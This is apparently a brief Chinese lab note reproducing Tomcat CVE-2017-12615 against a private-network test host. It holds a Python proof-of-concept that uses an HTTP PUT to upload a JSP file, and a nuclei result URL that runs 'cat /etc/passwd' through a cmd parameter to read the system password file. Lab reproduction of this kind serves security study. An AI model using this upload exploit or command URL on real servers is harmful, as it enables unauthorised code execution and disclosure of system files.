
这里的端口出现占用问题,需要修改端口

python进行POC验证
- import requests
-
- url='http://192.168.142.151:8080/1.jsp/'
- data='shell'
- header={
- 'Accept': '*/*',
- 'Accept-Language': 'en',
- 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
- 'Connection': 'close',
- 'Content-Type': 'application/x-www-form-urlencoded',
- 'Content-Length': '5'
- }
- requests.put(url,data=data,headers=header)

使用nuclei工具


找到[CVE-2017-12615] [http] [high] http://192.168.142.151/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
浏览器访问,获得/etc/passwd信息
